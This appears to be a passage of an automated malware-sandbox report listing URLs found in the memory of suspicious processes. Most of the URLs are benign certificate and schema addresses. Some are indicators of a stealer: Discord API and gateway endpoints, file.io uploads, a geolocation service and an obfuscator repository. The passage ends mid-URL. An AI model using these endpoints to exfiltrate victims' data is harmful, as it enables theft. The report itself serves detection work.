0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: based.exe, 00000010.00000003.1787045088.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SH
                                  Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: based.exe, 00000010.00000003.1787667879.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                  Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                  Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                                  Source: based.exe, 00000011.00000003.1818177199.000002A15D874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
                                  Source: RuntimeBroker2.0.exe, 00000006.00000002.1984341660.00000222000B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gateway.discord.gg
                                  Source: based.exe, 00000011.00000003.1977794400.000002A15DD06000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DD06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                                  Source: based.exe, 00000011.00000003.1961012527.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                                  Source: powershell.exe, 00000001.00000002.2426500786.000001F5CC9A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2426500786.000001F5CC861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                                  Source: based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792455105.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1787278172.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1791641274.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789808002.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1797061856.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1790168550.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1796054596.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1787045088.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1787667879.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                  Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.2016242056.0000019333660000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.000001470369D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.2016242056.0000019333660000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: based.exe, 00000010.00000003.1792313595.000001470369D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                                  Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000002.1842561126.0000024CBA21D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788541855.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789036690.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1788297799.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1795828971.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792455105.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0shtable_get
                                  Source: based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0shtable_get_Py_hashtable_hash_ptr_Py_hashtable_new_Py_hashtable_new_full_Py
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                  Source: powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
                                  Source: powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: powershell.exe, 00000001.00000002.1795294245.000001F5BC7F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1806725015.0000019AAB071000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792313595.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                                  Source: powershell.exe, 00000001.00000002.1795294245.000001F5BDE82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                  Source: powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: RuntimeBroker.exe, 00000005.00000003.1724092395.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726502247.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1726386604.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1724273440.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725852419.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723805692.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1725041975.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1723983433.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000005.00000003.1722902677.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1793017250.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1785189670.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1790100836.000001933365F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1792758623.0000014703690000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1789487671.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.google.com/maps/place/
                                  Source: based.exe, 00000011.00000003.1961012527.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1864241622.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1994709464.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1910540479.000002A15DC8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                                  Source: powershell.exe, 00000001.00000002.1795294245.000001F5BC7F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1806725015.0000019AAB071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                  Source: powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 00000001.00000002.1795294245.000001F5BE0CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: based.exe, 00000010.00000003.1794117542.0000014703690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
                                  Source: RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://discord.com/api/v9/channels/
                                  Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://discord.com/api/v9/guilds/
                                  Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://file.io/
                                  Source: RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg
                                  Source: RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg/?v=9&encording=json
                                  Source: RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg/?v=9&encording=jsonX
                                  Source: RuntimeBroker2.0.exe, 00000006.00000002.1984341660.0000022200001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gateway.discord.gg:443/?v=9&encording=json
                                  Source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: https://geolocation-db.com/json
                                  Source: based.exe, 00000011.00000003.1818177199.000002A15D8E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1818342182.000002A15DB8A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1817815301.000002A15DD1E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1819459988.000002A15DB8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
                                  Source: powershell.exe, 00000003.00000002.1806725015.0000019AAB29B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: RuntimeBroker.exe, 00000007.00000002.1769014225.0000010D2D0CB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1813171100.000002A15B8A6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B87E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811779581.000002A15B8C9000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000011.00000003.1811751921.000002A15B8D6000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1872130383.0000016BB1B20000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816415919.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1826593773.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812596305.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1816607556.0000016BB1ACD000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1811643648.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1931298572.0000016BB1B24000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.1928650960.0000016BB1AED000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1812268854.0000016BB1B1B000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1817284242.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1813296083.0000016BB1ADB000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000003.1822586123.0000016BB1B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
